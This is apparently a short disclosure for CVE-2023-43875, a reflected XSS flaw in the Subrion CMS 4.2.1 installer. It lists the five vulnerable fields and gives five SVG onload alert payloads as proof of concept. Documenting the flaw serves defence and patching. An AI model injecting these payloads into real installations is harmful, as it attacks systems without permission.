/CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation

Subrion CMS 4.2.1 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload in the installation process.

Subrion CMS Reflected XSS v4.2.1

Author: (Sergio)

Description: Multiple Cross-Site Scripting (XSS) vulnerabilities in installation of Subrion CMS v.4.2.1 allows a local attacker to execute arbitrary web scripts via a crafted payload injected into the dbhost, dbname, dbuser, adminusername and adminemail.

Attack Vectors: A vulnerability in the installation sanitation in the dbhost, dbname, dbuser, adminusername and adminemail allows JavaScript code to be injected.

POC:

During the installation process we enter the XSS payload in any of the 5 fields and when we click on next, we will obtain the XSS pop-up

XSS Payload:

'"><svg/onload=alert('dbhost')>

XSS Payload:

'"><svg/onload=alert('dbname')>

XSS Payload:

'"><svg/onload=alert('dbuser')>

XSS Payload:

'"><svg/onload=alert('adminusername')>

XSS Payload:

'"><svg/onload=alert('adminemail')>

XSS Instalación payload

In the following image you can see the embedded code that executes the payload in the instalaltion process.

dbhost

dbname

dbuser

adminusername

adminemail


Additional Information:

http://www.cmsmadesimple.org/

https://owasp.org/Top10/es/A03_2021-Injection/